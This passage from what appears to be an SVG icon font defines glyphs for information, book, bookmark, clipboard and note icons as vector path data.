<glyph unicode="&#xe976;" glyph-name="information" d="M544 288v160h-96v-32h64v-128h-64v-32h160v32h-64zM528 128v0 0c-167.895 0-304 136.105-304 304s136.105 304 304 304c167.895 0 304-136.105 304-304s-136.105-304-304-304zM528 160c150.221 0 272 121.779 272 272s-121.779 272-272 272c-150.221 0-272-121.779-272-272s121.779-272 272-272v0 0zM528 512c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0 0z" />
<glyph unicode="&#xe977;" glyph-name="information2" d="M528 128v0c-167.895 0-304 136.105-304 304s136.105 304 304 304c167.895 0 304-136.105 304-304s-136.105-304-304-304zM544 288v160h-96v-32h64v-128h-64v-32h160v32h-64zM528 512c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xe978;" glyph-name="information3" d="M544 256v224h-96v-32h64v-192h-64v-32h160v32h-64zM528 32v0 0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0 0zM528 544c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0 0z" />
<glyph unicode="&#xe979;" glyph-name="information4" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM544 256v224h-96v-32h64v-192h-64v-32h160v32h-64zM528 544c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xe97a;" glyph-name="book2" d="M544 672h-192v-608h448v608h-256zM832 32h-544.186c-52.828 0-95.814 42.973-95.814 95.983v624.017c0 44.491 35.711 80 79.762 80h560.238v-32h-16.15c-26.183 0-47.85-21.49-47.85-48 0-26.694 21.423-48 47.85-48h16.15v-672zM320 64v608h-48.238c-17.899 0-34.439 5.932-47.762 15.945v-560.228c0-35.19 28.564-63.717 63.843-63.717h32.157zM271.788 800c-26.392 0-47.788-21.306-47.788-48 0-26.51 21.352-48 47.788-48h480.212c0 0-16 25.264-16 48.846s16 47.154 16 47.154h-480.212z" />
<glyph unicode="&#xe97b;" glyph-name="book3" d="M287.814 32c-52.828 0-95.814 42.973-95.814 95.983v624.017c0 44.491 35.711 80 79.762 80h560.238v-32h-16.15c-26.183 0-47.85-21.49-47.85-48 0-26.694 21.423-48 47.85-48h16.15v-672h-480v672h400c0 0-16 25.264-16 48.846s16 47.154 16 47.154h-480.212c-26.392 0-47.788-21.306-47.788-48 0-26.51 21.352-48 47.788-48h48.212v-672h-32.186z" />
<glyph unicode="&#xe97c;" glyph-name="book-bookmark" d="M832 32v672h-16.15c-26.427 0-47.85 21.306-47.85 48 0 26.51 21.667 48 47.85 48h16.15v32h-560.238c-44.052 0-79.762-35.509-79.762-80v-624.017c0-53.010 42.986-95.983 95.814-95.983h544.186zM800 672v-608h-448v608h128v-352l96 96 96-96v352h128zM320 64h-32.157c-35.279 0-63.843 28.527-63.843 63.717v560.228c13.323-10.013 29.864-15.945 47.762-15.945h48.238v-608zM271.788 800h480.212c0 0-16-23.572-16-47.154s16-48.846 16-48.846h-480.212c-26.436 0-47.788 21.49-47.788 48 0 26.694 21.395 48 47.788 48zM512 672h128v-275.199l-64 64-64-64v275.199z" />
<glyph unicode="&#xe97d;" glyph-name="book-bookmark2" d="M480 704h-128v-672h480v672h-16.15c-26.427 0-47.85 21.306-47.85 48 0 26.51 21.667 48 47.85 48h16.15v32h-560.238c-44.052 0-79.762-35.509-79.762-80v-624.017c0-53.010 42.986-95.983 95.814-95.983h32.186v672h-48.212c-26.436 0-47.788 21.49-47.788 48 0 26.694 21.395 48 47.788 48h480.212c0 0-16-23.572-16-47.154s16-48.846 16-48.846h-80v-384l-96 96-96-96v384zM512 704v-307.199l64 64 64-64v307.199h-128z" />
<glyph unicode="&#xe97e;" glyph-name="clipboard-edit" d="M846.183 539.189l-83.19 83.19-361.347-361.398 83.378-83.378 361.159 361.586zM868.797 561.83l55.334 55.399c12.479 12.494 12.387 32.803-0.153 45.309l-37.754 37.65c-12.564 12.529-32.807 12.627-45.33 0.102l-55.274-55.282 83.178-83.178zM380.919 236.454l-20.465-99.606 100.317 19.755-79.851 79.851zM704 352v-319.885c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0.084 35.479 28.745 64 64.088 64h31.912c0.029 53.18 43.131 96 96.296 96h31.408c53.089 0 96.267-42.976 96.296-96h31.912c35.443 0 64.004-28.639 64.088-64v0h32.083c35.408 0 63.918-28.705 63.918-64.115v-95.885l114.563 114.563c25.366 25.366 65.641 25.232 90.565 0.309l37.744-37.744c24.846-24.846 24.785-65.471-0.309-90.565l-242.563-242.563zM672 576v127.902c0 17.727-14.551 32.098-31.999 32.098h-32.001c-0.084-35.479-28.745-64-64.088-64h-287.823c-35.443 0-64.004 28.639-64.088 64h-32.001c-17.672 0-31.999-14.045-31.999-32.098v-671.803c0-17.727 14.551-32.098 31.999-32.098h480.003c17.672 0 31.999 14.045 31.999 32.098v287.902l-192-192-160-32 32 160 320 320zM320 800h-64.142c-17.595 0-31.858-14.165-31.858-31.967v-32.067c0-17.655 14.235-31.967 31.858-31.967h288.283c17.595 0 31.858 14.165 31.858 31.967v32.067c0 17.655-14.235 31.967-31.858 31.967h-64.142v32.067c0 35.309-28.605 63.933-64.156 63.933h-31.688c-35.432 0-64.156-28.744-64.156-63.933v-32.067zM400 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0 0z" />
<glyph unicode="&#xe97f;" glyph-name="clipboard-edit2" d="M846.183 539.189l-361.159-361.586-83.378 83.378 361.347 361.398 83.19-83.19zM868.797 561.83l-83.178 83.178 55.274 55.282c12.523 12.525 32.766 12.428 45.33-0.102l37.754-37.65c12.541-12.506 12.633-32.815 0.153-45.309l-55.334-55.399zM380.919 236.454l79.851-79.851-100.317-19.755 20.465 99.606zM704 608v95.885c0 35.41-28.51 64.115-63.918 64.115h-32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.551-28.693-64.156-64.088-64.156h-287.823c-35.495 0-64.088 28.724-64.088 64.156v31.688c0 0.052 0 0.104 0 0.156h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h480.165c35.301 0 63.918 28.472 63.918 64.115v319.885l242.563 242.563c25.094 25.094 25.155 65.719 0.309 90.565l-37.744 37.744c-24.924 24.924-65.199 25.057-90.565-0.309l-114.563-114.563zM320 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM400 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xe980;" glyph-name="clipboard-add" d="M672 128v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM552.229 0h-328.312c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0.084 35.479 28.745 64 64.088 64h31.912c0.029 53.18 43.131 96 96.296 96h31.408c53.089 0 96.267-42.976 96.296-96h31.912c35.443 0 64.004-28.639 64.088-64v0h32.083c35.408 0 63.918-28.705 63.918-64.115v-467.076c56.987-29.131 96-88.414 96-156.809 0-97.202-78.798-176-176-176-54.654 0-103.489 24.912-135.771 64v0 0zM736 281.375v454.527c0 17.727-14.551 32.098-31.999 32.098h-32.001c-0.084-35.479-28.745-64-64.088-64h-287.823c-35.443 0-64.004 28.639-64.088 64h-32.001c-17.672 0-31.999-14.045-31.999-32.098v-671.803c0-17.727 14.551-32.098 31.999-32.098h307.192c-12.27 24.002-19.191 51.193-19.191 80 0 97.202 78.798 176 176 176 16.64 0 32.741-2.309 48-6.625v0 0zM384 832h-64.142c-17.595 0-31.858-14.165-31.858-31.967v-32.067c0-17.655 14.235-31.967 31.858-31.967h288.283c17.595 0 31.858 14.165 31.858 31.967v32.067c0 17.655-14.235 31.967-31.858 31.967h-64.142v32.067c0 35.309-28.605 63.933-64.156 63.933h-31.688c-35.432 0-64.156-28.744-64.156-63.933v-32.067zM464 832c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM688-32c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0z" />
<glyph unicode="&#xe981;" glyph-name="clipboard-add2" d="M672 96h-96v32h96v96h32v-96h96v-32h-96v-96h-32v96zM768 304.059v431.826c0 35.41-28.51 64.115-63.918 64.115h-32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.551-28.693-64.156-64.088-64.156h-287.823c-35.495 0-64.088 28.724-64.088 64.156v31.688c0 0.052 0 0.104 0 0.156h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h288.781c-20.698 32.33-32.698 70.763-32.698 112 0 114.875 93.125 208 208 208 28.349 0 55.373-5.671 80-15.941v0zM384 832v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM464 832c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM688-64c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xe982;" glyph-name="clipboard-remove" d="M552.229 0h-328.312c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0.084 35.479 28.745 64 64.088 64h31.912c0.029 53.18 43.131 96 96.296 96h31.408c53.089 0 96.267-42.976 96.296-96h31.912c35.443 0 64.004-28.639 64.088-64v0h32.083c35.408 0 63.918-28.705 63.918-64.115v-467.076c56.987-29.131 96-88.414 96-156.809 0-97.202-78.798-176-176-176-54.654 0-103.489 24.912-135.771 64v0 0zM736 281.375v454.527c0 17.727-14.551 32.098-31.999 32.098h-32.001c-0.084-35.479-28.745-64-64.088-64h-287.823c-35.443 0-64.004 28.639-64.088 64h-32.001c-17.672 0-31.999-14.045-31.999-32.098v-671.803c0-17.727 14.551-32.098 31.999-32.098h307.192c-12.27 24.002-19.191 51.193-19.191 80 0 97.202 78.798 176 176 176 16.64 0 32.741-2.309 48-6.625v0 0zM384 832h-64.142c-17.595 0-31.858-14.165-31.858-31.967v-32.067c0-17.655 14.235-31.967 31.858-31.967h288.283c17.595 0 31.858 14.165 31.858 31.967v32.067c0 17.655-14.235 31.967-31.858 31.967h-64.142v32.067c0 35.309-28.605 63.933-64.156 63.933h-31.688c-35.432 0-64.156-28.744-64.156-63.933v-32.067zM464 832c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM688-32c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0zM576 128v-32h224v32h-224z" />
<glyph unicode="&#xe983;" glyph-name="clipboard-remove2" d="M768 304.059v431.826c0 35.41-28.51 64.115-63.918 64.115h-32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.551-28.693-64.156-64.088-64.156h-287.823c-35.495 0-64.088 28.724-64.088 64.156v31.688c0 0.052 0 0.104 0 0.156h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h288.781c-20.698 32.33-32.698 70.763-32.698 112 0 114.875 93.125 208 208 208 28.349 0 55.373-5.671 80-15.941v0zM384 832v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM464 832c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM688-64v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM576 128v-32h224v32h-224z" />
<glyph unicode="&#xe984;" glyph-name="clipboard3" d="M416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM384 832h-31.912c-35.343 0-64.004-28.521-64.088-64h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h480.165c35.301 0 63.918 28.472 63.918 64.115v671.77c0 35.41-28.51 64.115-63.918 64.115h-32.083c-0.084 35.361-28.645 64-64.088 64h-31.912c-0.029 53.024-43.207 96-96.296 96h-31.408c-53.165 0-96.267-42.82-96.296-96v0 0zM704 736h32.001c17.448 0 31.999-14.371 31.999-32.098v-671.803c0-18.053-14.326-32.098-31.999-32.098h-480.003c-17.448 0-31.999 14.371-31.999 32.098v671.803c0 18.053 14.326 32.098 31.999 32.098h32.001c0.084-35.361 28.645-64 64.088-64h287.823c35.343 0 64.004 28.521 64.088 64v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xe985;" glyph-name="clipboard4" d="M416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM704 768h32.083c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.432 28.593-64.156 64.088-64.156h287.823c35.395 0 64.088 28.605 64.088 64.156v31.688c0 0.052 0 0.104 0 0.156v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xe986;" glyph-name="clipboard-download" d="M480 190.4l-104 104-24-24 144-144 144 144-24 24-104-104v353.6h-32v-353.6zM416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM384 832h-31.912c-35.343 0-64.004-28.521-64.088-64h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h480.165c35.301 0 63.918 28.472 63.918 64.115v671.77c0 35.41-28.51 64.115-63.918 64.115h-32.083c-0.084 35.361-28.645 64-64.088 64h-31.912c-0.029 53.024-43.207 96-96.296 96h-31.408c-53.165 0-96.267-42.82-96.296-96v0 0zM704 736h32.001c17.448 0 31.999-14.371 31.999-32.098v-671.803c0-18.053-14.326-32.098-31.999-32.098h-480.003c-17.448 0-31.999 14.371-31.999 32.098v671.803c0 18.053 14.326 32.098 31.999 32.098h32.001c0.084-35.361 28.645-64 64.088-64h287.823c35.343 0 64.004 28.521 64.088 64v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xe987;" glyph-name="clipboard-download2" d="M480 190.4l-104 104-24-24 144-144 144 144-24 24-104-104v353.6h-32v-353.6zM416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM704 768h32.083c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.432 28.593-64.156 64.088-64.156h287.823c35.395 0 64.088 28.605 64.088 64.156v31.688c0 0.052 0 0.104 0 0.156v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xe988;" glyph-name="clipboard-upload" d="M480 320l-104-104-24 24 144 144 144-144-24-24-104 104v-320h-32v320zM416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM384 832h-31.912c-35.343 0-64.004-28.521-64.088-64h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h480.165c35.301 0 63.918 28.472 63.918 64.115v671.77c0 35.41-28.51 64.115-63.918 64.115h-32.083c-0.084 35.361-28.645 64-64.088 64h-31.912c-0.029 53.024-43.207 96-96.296 96h-31.408c-53.165 0-96.267-42.82-96.296-96v0 0zM704 736h32.001c17.448 0 31.999-14.371 31.999-32.098v-671.803c0-18.053-14.326-32.098-31.999-32.098h-480.003c-17.448 0-31.999 14.371-31.999 32.098v671.803c0 18.053 14.326 32.098 31.999 32.098h32.001c0.084-35.361 28.645-64 64.088-64h287.823c35.343 0 64.004 28.521 64.088 64v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xe989;" glyph-name="clipboard-upload2" d="M416 800v32.1c0 35.2 28.7 63.9 64.2 63.9h31.7c35.6 0 64.2-28.6 64.2-63.9v-32.1h64.1c17.6 0 31.9-14.3 31.9-32v-32c0-17.8-14.3-32-31.9-32h-288.3c-17.6 0-31.9 14.3-31.9 32v32c0 17.8 14.3 32 31.9 32h64.1zM496 800c8.8 0 16 7.2 16 16s-7.2 16-16 16-16-7.2-16-16 7.2-16 16-16v0zM736.1 768h-32.1v-31.8c0-35.6-28.7-64.2-64.1-64.2h-287.8c-35.5 0-64.1 28.7-64.1 64.2v31.8h-32.1c-35.3 0-63.9-28.5-63.9-64.1v-671.8c0-35.4 28.5-64.1 63.9-64.1h224.1v352l-104-104-24 24 144 144 144-144-24-24-104 104v-352h224.1c35.3 0 63.9 28.5 63.9 64.1v671.8c0 35.4-28.5 64.1-63.9 64.1z" />
<glyph unicode="&#xe98a;" glyph-name="clipboard-checked" d="M416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM384 832h-31.912c-35.343 0-64.004-28.521-64.088-64h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h480.165c35.301 0 63.918 28.472 63.918 64.115v671.77c0 35.41-28.51 64.115-63.918 64.115h-32.083c-0.084 35.361-28.645 64-64.088 64h-31.912c-0.029 53.024-43.207 96-96.296 96h-31.408c-53.165 0-96.267-42.82-96.296-96v0 0zM704 736h32.001c17.448 0 31.999-14.371 31.999-32.098v-671.803c0-18.053-14.326-32.098-31.999-32.098h-480.003c-17.448 0-31.999 14.371-31.999 32.098v671.803c0 18.053 14.326 32.098 31.999 32.098h32.001c0.084-35.361 28.645-64 64.088-64h287.823c35.343 0 64.004 28.521 64.088 64v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM456.114 202.071l248.902 248.902-22.627 22.627-226.274-226.274-119.765 119.765-22.627-22.627 142.392-142.392z" />
<glyph unicode="&#xe98b;" glyph-name="clipboard-checked2" d="M416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM704 768h32.083c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.432 28.593-64.156 64.088-64.156h287.823c35.395 0 64.088 28.605 64.088 64.156v31.688c0 0.052 0 0.104 0 0.156v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM456.114 202.071l248.902 248.902-22.627 22.627-226.274-226.274-119.765 119.765-22.627-22.627 142.392-142.392z" />
<glyph unicode="&#xe98c;" glyph-name="clipboard-text" d="M416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM384 832h-31.912c-35.343 0-64.004-28.521-64.088-64h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h480.165c35.301 0 63.918 28.472 63.918 64.115v671.77c0 35.41-28.51 64.115-63.918 64.115h-32.083c-0.084 35.361-28.645 64-64.088 64h-31.912c-0.029 53.024-43.207 96-96.296 96h-31.408c-53.165 0-96.267-42.82-96.296-96v0 0zM704 736h32.001c17.448 0 31.999-14.371 31.999-32.098v-671.803c0-18.053-14.326-32.098-31.999-32.098h-480.003c-17.448 0-31.999 14.371-31.999 32.098v671.803c0 18.053 14.326 32.098 31.999 32.098h32.001c0.084-35.361 28.645-64 64.088-64h287.823c35.343 0 64.004 28.521 64.088 64v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM288 544v-32h416v32h-416zM288 448v-32h416v32h-416zM288 352v-32h416v32h-416zM288 256v-32h416v32h-416zM288 160v-32h416v32h-416z" />
<glyph unicode="&#xe98d;" glyph-name="clipboard-text2" d="M416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM704 768h32.083c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.432 28.593-64.156 64.088-64.156h287.823c35.395 0 64.088 28.605 64.088 64.156v31.688c0 0.052 0 0.104 0 0.156v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM288 544v-32h416v32h-416zM288 448v-32h416v32h-416zM288 352v-32h416v32h-416zM288 256v-32h416v32h-416zM288 160v-32h416v32h-416z" />
<glyph unicode="&#xe98e;" glyph-name="clipboard-list" d="M416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM384 832h-31.912c-35.343 0-64.004-28.521-64.088-64h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h480.165c35.301 0 63.918 28.472 63.918 64.115v671.77c0 35.41-28.51 64.115-63.918 64.115h-32.083c-0.084 35.361-28.645 64-64.088 64h-31.912c-0.029 53.024-43.207 96-96.296 96h-31.408c-53.165 0-96.267-42.82-96.296-96v0 0zM704 736h32.001c17.448 0 31.999-14.371 31.999-32.098v-671.803c0-18.053-14.326-32.098-31.999-32.098h-480.003c-17.448 0-31.999 14.371-31.999 32.098v671.803c0 18.053 14.326 32.098 31.999 32.098h32.001c0.084-35.361 28.645-64 64.088-64h287.823c35.343 0 64.004 28.521 64.088 64v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM448 512v-32h256v32h-256zM288 544h96v-96h-96v96zM320 512v-32h32v32h-32zM288 384h96v-96h-96v96zM320 352v-32h32v32h-32zM448 352v-32h256v32h-256zM288 224h96v-96h-96v96zM320 192v-32h32v32h-32zM448 192v-32h256v32h-256z" />
<glyph unicode="&#xe98f;" glyph-name="clipboard-list2" d="M416 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM704 768h32.083c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.432 28.593-64.156 64.088-64.156h287.823c35.395 0 64.088 28.605 64.088 64.156v31.688c0 0.052 0 0.104 0 0.156v0 0zM496 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM448 512v-32h256v32h-256zM288 544v-96h96v96h-96zM320 512v-32h32v32h-32zM288 384v-96h96v96h-96zM320 352v-32h32v32h-32zM448 352v-32h256v32h-256zM288 224v-96h96v96h-96zM320 192v-32h32v32h-32zM448 192v-32h256v32h-256z" />
<glyph unicode="&#xe990;" glyph-name="note2" d="M192 608v-480.040c0-17.924 14.434-31.96 32.239-31.96h447.761v159.811c0 35.82 28.624 64.189 63.933 64.189h128.067v288h-672zM192 640h672v95.781c0 17.821-14.309 32.219-31.96 32.219h-608.080c-17.924 0-31.96-14.309-31.96-31.96v-96.040zM688 64h-463.997c-35.348 0-64.003 28.852-64.003 64.028v607.945c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.624 64.028-63.81v-448.19l-192-224h-16zM704 112l150.398 176h-118.503c-17.475 0-31.896-14.453-31.896-32.281v-143.719z" />
<glyph unicode="&#xe991;" glyph-name="note3" d="M160 608v-479.972c0-35.176 28.569-64.028 63.81-64.028h448.19v192.061c0 35.565 28.739 63.939 64.189 63.939h159.811v288h-736zM160 640v95.972c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.589 64.028-63.74v-96.26h-736zM704 64v191.906c0 17.725 14.431 32.094 31.705 32.094h160.295l-192-224z" />
<glyph unicode="&#xe992;" glyph-name="note-add" d="M800 160h-96v32h96v96h32v-96h96v-32h-96v-96h-32v96zM659.191 96h-435.231c-17.651 0-31.96 14.036-31.96 31.96v480.040h672v-262.625c-15.259 4.316-31.36 6.625-48 6.625-97.202 0-176-78.798-176-176 0-28.807 6.921-55.998 19.191-80v0zM896 332.809v403.163c0 35.176-28.666 64.028-64.028 64.028h-607.945c-35.176 0-64.028-28.666-64.028-64.028v-607.945c0-35.176 28.666-64.028 64.028-64.028h456.202c32.281-39.088 81.117-64 135.771-64 97.202 0 176 78.798 176 176 0 68.395-39.013 127.678-96 156.809v0zM192 640v96.040c0 17.651 14.036 31.96 31.96 31.96h608.080c17.651 0 31.96-14.036 31.96-31.96v-96.040h-672zM816 32v0 0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144z" />
